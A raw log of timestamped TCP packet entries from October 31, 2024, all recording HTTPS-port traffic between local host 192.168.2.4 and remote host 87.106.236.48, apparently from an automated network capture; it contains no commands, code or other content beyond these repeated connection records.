                                                                                                                                            Oct 31, 2024 17:12:39.392534018 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.392574072 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.393289089 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.393337965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.393357038 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.393362045 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.393381119 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.393404961 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.394567966 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.394601107 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.394622087 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.394625902 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.394648075 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.394671917 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.402842999 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.402867079 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.402925014 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.402926922 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.402935028 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.402959108 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.402973890 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.402977943 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.403007984 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.403028011 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.403400898 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.403414965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.403460979 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.403465033 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.403513908 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.404098034 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.404112101 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.404162884 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.404174089 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.404182911 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.404211998 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.447788000 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.447805882 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.447870016 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.447879076 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.447921038 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.474867105 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.474884987 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.474957943 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.474966049 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.474999905 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.475744009 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.475758076 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.475816965 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.475822926 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.475857973 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.476435900 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.476449966 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.476501942 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.476506948 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.476542950 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.477475882 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.477490902 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.477540970 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.477545977 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.477581024 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.478046894 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.478063107 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.478096008 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.478101015 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.478127003 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.478141069 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.507719040 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.507736921 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.507853985 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.507862091 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.507895947 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.508600950 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.508614063 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.508665085 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.508670092 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.508702993 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.509301901 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.509315968 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.509367943 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.509372950 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.509407997 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.510088921 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.510103941 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.510152102 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.510158062 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.510193110 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.510966063 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.510979891 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.511028051 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.511032104 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.511061907 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.511284113 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.511301041 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.511348963 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.511353970 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.511389017 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.512612104 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.512625933 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.512671947 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.512676954 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.512722015 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.517894030 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.517918110 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.517956018 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.517960072 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.517982960 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.518013954 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.518295050 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.518309116 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.518357992 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.518362999 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.518402100 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.518973112 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.518986940 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.519046068 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.519051075 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.519087076 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.519503117 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.519521952 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.519562006 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.519567013 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.519588947 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.519615889 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.543364048 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.543390036 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.543533087 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.543545008 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.543584108 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.609447002 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.609466076 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.609673023 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.609683990 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.609745979 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.609899998 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.609914064 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.609966993 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.609972954 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.610009909 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.610404968 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.610419035 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.610480070 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.610485077 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.610527039 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.611062050 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.611076117 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.611125946 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.611129999 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.611176968 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.611920118 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.611933947 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.611985922 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.611990929 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.612031937 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.612215042 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.612227917 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.612282991 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.612287998 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.612324953 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.624120951 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.624151945 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.624196053 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.624200106 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.624242067 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.624722004 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.624737978 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.624793053 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.624798059 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.624835014 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.625456095 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.625475883 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.625530958 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.625535965 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.625572920 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.626140118 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.626153946 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.626207113 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.626213074 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.626250029 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.626611948 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.626625061 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.626682997 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.626688957 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.626728058 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.627270937 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.627285957 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.627343893 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.627348900 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.627407074 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.628241062 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.628257990 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.628309011 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.628315926 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.628350019 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.634330034 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.634346962 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.634416103 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.634421110 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.634454012 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.635090113 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.635106087 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.635174990 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.635179996 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.635212898 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.636123896 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.636137962 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.636197090 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.636200905 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.636231899 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.636392117 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.636405945 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.636457920 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.636464119 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.636501074 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.637135983 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.637151003 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.637217045 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.637222052 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.637257099 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.681448936 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.681466103 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.681565046 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.681570053 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.681612968 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.709698915 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.709719896 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.709815979 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.709824085 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.709866047 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.710485935 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.710500002 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.710555077 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.710560083 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.710608959 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.726373911 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.726389885 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.726466894 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.726473093 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.726509094 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.727261066 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.727276087 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.727340937 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.727345943 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.727381945 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.727953911 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.727973938 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.728027105 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.728030920 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.728065968 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.740463018 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.740478039 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.740533113 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.740540028 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.740576982 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.741318941 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.741334915 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.741385937 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.741390944 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.741422892 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.741791964 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.741807938 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.741858959 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.741863966 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.741895914 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.742602110 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.742616892 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.742667913 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.742674112 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.742703915 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.743132114 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.743145943 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.743196011 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.743201971 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.743233919 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.743701935 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.743716955 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.743767977 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.743773937 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.743807077 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.744410038 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.744426012 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.744476080 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.744481087 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.744513988 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.745026112 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.745040894 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.745086908 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.745091915 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.745122910 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.751246929 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.751266003 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.751301050 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.751306057 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.751343012 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.751368046 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.752120018 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.752134085 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.752191067 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.752196074 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.752233982 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.752770901 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.752784967 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.752823114 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.752827883 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.752856016 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.752870083 CET49761443192.168.2.487.106.236.48
                                                                                                                                            Oct 31, 2024 17:12:39.753453970 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.753468037 CET4434976187.106.236.48192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:39.753516912 CET49761443192.168.2.487.106.236.48
